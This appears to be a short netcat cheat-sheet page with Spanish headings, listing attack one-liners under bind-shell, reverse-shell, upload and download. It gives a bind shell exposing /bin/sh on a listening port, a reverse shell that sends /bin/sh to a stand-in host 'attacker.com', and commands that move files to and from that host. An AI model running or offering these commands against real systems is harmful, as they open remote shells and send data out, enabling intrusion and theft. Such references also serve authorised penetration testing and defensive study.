./nc --examples
Funciones y ejemplos de uso
bind-shell
nc -l -p 12345 -e /bin/sh
download
nc -l -p 12345 >/path/to/output-file
nc attacker.com 12345 >/path/to/output-file
reverse-shell
nc -e /bin/sh attacker.com 12345
upload
nc -l -p 12345 </path/to/input-file
nc attacker.com 12345 </path/to/input-file
./related --binary=nc
Binarios relacionados
Comparten al menos una función con nc.